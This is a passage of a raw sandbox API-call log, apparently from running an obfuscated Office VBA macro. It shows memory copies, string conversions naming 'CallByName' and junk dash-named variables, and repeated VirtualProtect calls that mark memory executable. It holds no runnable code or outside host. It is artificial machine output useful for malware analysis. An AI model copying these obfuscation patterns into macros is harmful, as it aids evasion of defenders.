_Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.356] memcpy (in: _Dst=0xb2a5270, _Src=0x1978c4, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.357] memcpy (in: _Dst=0xb2a5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.361] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.361] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xb42fd94, cbMultiByte=9, lpWideCharStr=0x9be058c, cchWideChar=20 | out: lpWideCharStr="ZhcGI4Fko") returned 9 [0093.363] memcpy (in: _Dst=0xf4d4080, _Src=0x9be0588, _Size=0x18 | out: _Dst=0xf4d4080) returned 0xf4d4080 [0093.364] memcpy (in: _Dst=0xb2a516c, _Src=0x1978dc, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.366] memcpy (in: _Dst=0xb2a516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.372] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82d16, cbMultiByte=6, lpWideCharStr=0x1976c4, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0093.376] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302f0a, cbMultiByte=6, lpWideCharStr=0x197724, cchWideChar=7 | out: lpWideCharStr="VbGet") returned 6 [0093.392] memcpy (in: _Dst=0xf723ad0, _Src=0x8921bd8, _Size=0x4 | out: _Dst=0xf723ad0) returned 0xf723ad0 [0093.405] memcpy (in: _Dst=0xb2a5170, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5170) returned 0xb2a5170 [0093.405] memcpy (in: _Dst=0xb2a5174, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5174) returned 0xb2a5174 [0093.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82d3a, cbMultiByte=11, lpWideCharStr=0x1976c4, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0093.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x11302eba, cbMultiByte=11, lpWideCharStr=0x197724, cchWideChar=12 | out: lpWideCharStr="CallByName") returned 11 [0093.408] memcpy (in: _Dst=0x1976ec, _Src=0x197760, _Size=0x8 | out: _Dst=0x1976ec) returned 0x1976ec [0093.408] memcpy (in: _Dst=0xf4dcfc0, _Src=0x1976ec, _Size=0x8 | out: _Dst=0xf4dcfc0) returned 0xf4dcfc0 [0093.408] CRetailMalloc_Alloc () returned 0xc96a498 [0093.408] CRetailMalloc_Free () returned 0x1 [0093.408] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.408] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97", cchCount2=-1) returned 3 [0093.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a82d62, cbMultiByte=20, lpWideCharStr=0x1976c4, cchWideChar=21 | out: lpWideCharStr="———––—––————––—————") returned 20 [0093.409] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40852, cbMultiByte=20, lpWideCharStr=0x197724, cchWideChar=21 | out: lpWideCharStr="———––—––————––—————") returned 20 [0093.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40852, cbMultiByte=20, lpWideCharStr=0x197724, cchWideChar=21 | out: lpWideCharStr="———––—––————––—————") returned 20 [0093.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40852, cbMultiByte=20, lpWideCharStr=0x197724, cchWideChar=21 | out: lpWideCharStr="———––—––————––—————") returned 20 [0093.410] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="\x97\x97\x97\x96\x96\x97\x97\x96\x96\x96\x97\x96\x96\x97\x96\x97\x96\x97\x96", cchCount1=-1, lpString2="\x97\x97\x97\x96\x96\x97\x96\x96\x97\x97\x97\x97\x96\x96\x97\x97\x97\x97\x97", cchCount2=-1) returned 3 [0093.410] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40852, cbMultiByte=20, lpWideCharStr=0x197724, cchWideChar=21 | out: lpWideCharStr="———––—––————––—————") returned 20 [0093.410] CRetailMalloc_Alloc () returned 0xc96a498 [0093.410] _mbscpy_s (in: _Dst=0xc96a498, _DstSizeInBytes=0x14, _Src=0x9a40852 | out: _Dst=0xc96a498) returned 0x0 [0093.411] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9a40abe, cbMultiByte=27, lpWideCharStr=0x197734, cchWideChar=28 | out: lpWideCharStr="_B_var_———––—––————––—————") returned 27 [0093.411] _mbscpy_s (in: _Dst=0x19779c, _DstSizeInBytes=0x14, _Src=0x9a40852 | out: _Dst=0x19779c) returned 0x0 [0093.411] CRetailMalloc_Free () returned 0x1 [0093.411] memcpy (in: _Dst=0xb2a5270, _Src=0xb2a5270, _Size=0xc | out: _Dst=0xb2a5270) returned 0xb2a5270 [0093.411] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.411] memcpy (in: _Dst=0xb2a516c, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a516c) returned 0xb2a516c [0093.412] memcpy (in: _Dst=0xb2a5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.412] memcpy (in: _Dst=0xb2a5168, _Src=0x197714, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.412] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.412] memcpy (in: _Dst=0xb2a5168, _Src=0x1978a8, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.413] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x6961ded0, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0093.413] memcpy (in: _Dst=0xf4b2d34, _Src=0x197944, _Size=0x18 | out: _Dst=0xf4b2d34) returned 0xf4b2d34 [0093.413] CRetailMalloc_Realloc () returned 0xf4b2c48 [0093.413] CRetailMalloc_Free () returned 0x1 [0093.413] GetCurrentProcess () returned 0xffffffff [0093.413] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0093.413] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.415] GetCurrentProcess () returned 0xffffffff [0093.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0093.415] GetCurrentProcess () returned 0xffffffff [0093.415] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0093.415] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.416] GetCurrentProcess () returned 0xffffffff [0093.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0093.416] GetCurrentProcess () returned 0xffffffff [0093.416] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0093.416] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.417] GetCurrentProcess () returned 0xffffffff [0093.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0093.417] GetCurrentProcess () returned 0xffffffff [0093.417] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0093.417] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.418] GetCurrentProcess () returned 0xffffffff [0093.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0093.418] GetCurrentProcess () returned 0xffffffff [0093.418] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0093.418] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.419] GetCurrentProcess () returned 0xffffffff [0093.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0093.419] GetCurrentProcess () returned 0xffffffff [0093.419] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0093.419] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.420] GetCurrentProcess () returned 0xffffffff [0093.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0093.421] GetCurrentProcess () returned 0xffffffff [0093.421] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0093.421] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.422] GetCurrentProcess () returned 0xffffffff [0093.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0093.422] GetCurrentProcess () returned 0xffffffff [0093.422] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0093.422] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.423] GetCurrentProcess () returned 0xffffffff [0093.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0093.423] GetCurrentProcess () returned 0xffffffff [0093.423] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0093.423] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.424] GetCurrentProcess () returned 0xffffffff [0093.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0093.424] GetCurrentProcess () returned 0xffffffff [0093.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0093.424] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.424] GetCurrentProcess () returned 0xffffffff [0093.424] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0093.425] GetCurrentProcess () returned 0xffffffff [0093.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0093.425] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.425] GetCurrentProcess () returned 0xffffffff [0093.425] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a5, dwSize=0x2) returned 1 [0093.426] GetCurrentProcess () returned 0xffffffff [0093.426] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c4, dwSize=0x14) returned 1 [0093.426] VirtualProtect (in: lpAddress=0xcd168c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.426] GetCurrentProcess () returned 0xffffffff [0093.426] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168c5, dwSize=0x2) returned 1 [0093.426] GetCurrentProcess () returned 0xffffffff [0093.426] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c38, dwSize=0x14) returned 1 [0093.426] VirtualProtect (in: lpAddress=0xf4d2c38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.427] GetCurrentProcess () returned 0xffffffff [0093.427] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c39, dwSize=0x2) returned 1 [0093.427] GetCurrentProcess () returned 0xffffffff [0093.427] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c58, dwSize=0x14) returned 1 [0093.427] VirtualProtect (in: lpAddress=0xf4d2c58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.428] GetCurrentProcess () returned 0xffffffff [0093.428] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c59, dwSize=0x2) returned 1 [0093.428] GetCurrentProcess () returned 0xffffffff [0093.428] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c78, dwSize=0x14) returned 1 [0093.428] VirtualProtect (in: lpAddress=0xf4d2c78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.429] GetCurrentProcess () returned 0xffffffff [0093.429] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c79, dwSize=0x2) returned 1 [0093.429] GetCurrentProcess () returned 0xffffffff [0093.429] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c98, dwSize=0x14) returned 1 [0093.429] VirtualProtect (in: lpAddress=0xf4d2c98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.430] GetCurrentProcess () returned 0xffffffff [0093.430] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2c99, dwSize=0x2) returned 1 [0093.430] GetCurrentProcess () returned 0xffffffff [0093.430] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb8, dwSize=0x14) returned 1 [0093.430] VirtualProtect (in: lpAddress=0xf4d2cb8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.431] GetCurrentProcess () returned 0xffffffff [0093.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cb9, dwSize=0x2) returned 1 [0093.431] GetCurrentProcess () returned 0xffffffff [0093.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd8, dwSize=0x14) returned 1 [0093.431] VirtualProtect (in: lpAddress=0xf4d2cd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.431] GetCurrentProcess () returned 0xffffffff [0093.431] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cd9, dwSize=0x2) returned 1 [0093.431] GetCurrentProcess () returned 0xffffffff [0093.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf8, dwSize=0x14) returned 1 [0093.432] VirtualProtect (in: lpAddress=0xf4d2cf8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.432] GetCurrentProcess () returned 0xffffffff [0093.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2cf9, dwSize=0x2) returned 1 [0093.432] GetCurrentProcess () returned 0xffffffff [0093.432] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d18, dwSize=0x14) returned 1 [0093.432] VirtualProtect (in: lpAddress=0xf4d2d18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.433] GetCurrentProcess () returned 0xffffffff [0093.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d19, dwSize=0x2) returned 1 [0093.433] GetCurrentProcess () returned 0xffffffff [0093.433] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d38, dwSize=0x14) returned 1 [0093.433] VirtualProtect (in: lpAddress=0xf4d2d38, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.434] GetCurrentProcess () returned 0xffffffff [0093.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d39, dwSize=0x2) returned 1 [0093.434] GetCurrentProcess () returned 0xffffffff [0093.434] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d58, dwSize=0x14) returned 1 [0093.434] VirtualProtect (in: lpAddress=0xf4d2d58, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.435] GetCurrentProcess () returned 0xffffffff [0093.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d59, dwSize=0x2) returned 1 [0093.435] GetCurrentProcess () returned 0xffffffff [0093.435] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d78, dwSize=0x14) returned 1 [0093.435] VirtualProtect (in: lpAddress=0xf4d2d78, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.444] GetCurrentProcess () returned 0xffffffff [0093.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d79, dwSize=0x2) returned 1 [0093.444] GetCurrentProcess () returned 0xffffffff [0093.444] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d98, dwSize=0x14) returned 1 [0093.444] VirtualProtect (in: lpAddress=0xf4d2d98, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.448] GetCurrentProcess () returned 0xffffffff [0093.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2d99, dwSize=0x2) returned 1 [0093.448] GetCurrentProcess () returned 0xffffffff [0093.448] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db8, dwSize=0x14) returned 1 [0093.448] VirtualProtect (in: lpAddress=0xf4d2db8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.457] GetCurrentProcess () returned 0xffffffff [0093.457] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2db9, dwSize=0x2) returned 1 [0093.457] GetCurrentProcess () returned 0xffffffff [0093.459] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd8, dwSize=0x14) returned 1 [0093.459] VirtualProtect (in: lpAddress=0xf4d2dd8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.461] GetCurrentProcess () returned 0xffffffff [0093.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2dd9, dwSize=0x2) returned 1 [0093.461] GetCurrentProcess () returned 0xffffffff [0093.461] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df8, dwSize=0x14) returned 1 [0093.461] VirtualProtect (in: lpAddress=0xf4d2df8, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.563] GetCurrentProcess () returned 0xffffffff [0093.563] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2df9, dwSize=0x2) returned 1 [0093.564] GetCurrentProcess () returned 0xffffffff [0093.564] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e18, dwSize=0x14) returned 1 [0093.564] VirtualProtect (in: lpAddress=0xf4d2e18, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.569] GetCurrentProcess () returned 0xffffffff [0093.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d2e19, dwSize=0x2) returned 1 [0093.569] GetCurrentProcess () returned 0xffffffff [0093.569] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5758, dwSize=0x14) returned 1 [0093.570] VirtualProtect (in: lpAddress=0xf4d5758, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.572] GetCurrentProcess () returned 0xffffffff [0093.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5759, dwSize=0x2) returned 1 [0093.572] GetCurrentProcess () returned 0xffffffff [0093.572] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5778, dwSize=0x14) returned 1 [0093.577] VirtualProtect (in: lpAddress=0xf4d5778, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.579] GetCurrentProcess () returned 0xffffffff [0093.581] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5779, dwSize=0x2) returned 1 [0093.581] GetCurrentProcess () returned 0xffffffff [0093.581] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5798, dwSize=0x14) returned 1 [0093.581] VirtualProtect (in: lpAddress=0xf4d5798, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1975ec | out: lpflOldProtect=0x1975ec*=0x40) returned 1 [0093.586] GetCurrentProcess () returned 0xffffffff [0093.586] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xf4d5799, dwSize=0x2) returned 1 [0093.586] SetErrorMode (uMode=0x8001) returned 0x8001 [0093.587] _stricmp (_Str1="VBE7.DLL", _Str2="VBE6.DLL") returned 1 [0093.587] LoadLibraryA (lpLibFileName="VBE7.DLL") returned 0x693e0000 [0093.590] SetErrorMode (uMode=0x8001) returned 0x8001 [0093.591] GetProcAddress (hModule=0x693e0000, lpProcName=0x2cb) returned 0x695b04b4 [0093.593] GetAsyncKeyState (vKey=3) returned 0 [0093.596] GetAsyncKeyState (vKey=3) returned 0 [0093.596] CRetailMalloc_Alloc () returned 0xf4b2da0 [0093.596] memcpy (in: _Dst=0xb2a5168, _Src=0x19779c, _Size=0x4 | out: _Dst=0xb2a5168) returned 0xb2a5168 [0093.596] memcpy (in: _Dst=0xf4b2dc0, _Src=0x197804, _Size=0x18 | out: _Dst=0xf4b2dc0) returned 0xf4b2dc0 [0093.596] CRetailMalloc_Realloc () returned 0xf4b2da0 [0093.596] CRetailMalloc_Free () returned 0x1 [0093.596] GetCurrentProcess () returned 0xffffffff [0093.596] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16764, dwSize=0x14) returned 1 [0093.596] VirtualProtect (in: lpAddress=0xcd16764, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.597] GetCurrentProcess () returned 0xffffffff [0093.597] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16765, dwSize=0x2) returned 1 [0093.597] GetCurrentProcess () returned 0xffffffff [0093.597] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16784, dwSize=0x14) returned 1 [0093.597] VirtualProtect (in: lpAddress=0xcd16784, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.598] GetCurrentProcess () returned 0xffffffff [0093.598] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16785, dwSize=0x2) returned 1 [0093.598] GetCurrentProcess () returned 0xffffffff [0093.598] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a4, dwSize=0x14) returned 1 [0093.598] VirtualProtect (in: lpAddress=0xcd167a4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.599] GetCurrentProcess () returned 0xffffffff [0093.599] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167a5, dwSize=0x2) returned 1 [0093.599] GetCurrentProcess () returned 0xffffffff [0093.599] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c4, dwSize=0x14) returned 1 [0093.599] VirtualProtect (in: lpAddress=0xcd167c4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.600] GetCurrentProcess () returned 0xffffffff [0093.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167c5, dwSize=0x2) returned 1 [0093.600] GetCurrentProcess () returned 0xffffffff [0093.600] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e4, dwSize=0x14) returned 1 [0093.600] VirtualProtect (in: lpAddress=0xcd167e4, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.601] GetCurrentProcess () returned 0xffffffff [0093.601] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd167e5, dwSize=0x2) returned 1 [0093.601] GetCurrentProcess () returned 0xffffffff [0093.601] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16804, dwSize=0x14) returned 1 [0093.601] VirtualProtect (in: lpAddress=0xcd16804, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.602] GetCurrentProcess () returned 0xffffffff [0093.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16805, dwSize=0x2) returned 1 [0093.602] GetCurrentProcess () returned 0xffffffff [0093.602] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16824, dwSize=0x14) returned 1 [0093.602] VirtualProtect (in: lpAddress=0xcd16824, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.603] GetCurrentProcess () returned 0xffffffff [0093.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16825, dwSize=0x2) returned 1 [0093.603] GetCurrentProcess () returned 0xffffffff [0093.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16844, dwSize=0x14) returned 1 [0093.603] VirtualProtect (in: lpAddress=0xcd16844, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.603] GetCurrentProcess () returned 0xffffffff [0093.603] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16845, dwSize=0x2) returned 1 [0093.603] GetCurrentProcess () returned 0xffffffff [0093.604] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16864, dwSize=0x14) returned 1 [0093.604] VirtualProtect (in: lpAddress=0xcd16864, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.604] GetCurrentProcess () returned 0xffffffff [0093.604] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16865, dwSize=0x2) returned 1 [0093.604] GetCurrentProcess () returned 0xffffffff [0093.604] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16884, dwSize=0x14) returned 1 [0093.604] VirtualProtect (in: lpAddress=0xcd16884, dwSize=0x14, flNewProtect=0x40, lpflOldProtect=0x1974ac | out: lpflOldProtect=0x1974ac*=0x40) returned 1 [0093.605] GetCurrentProcess () returned 0xffffffff [0093.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd16885, dwSize=0x2) returned 1 [0093.605] GetCurrentProcess () returned 0xffffffff [0093.605] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0xcd168a4, dwSize=0x14) returned 1 [0093.605] VirtualProtect (in: lpAddress=0xcd168a4, dwSize=0x14, flNewProtect=0x40, 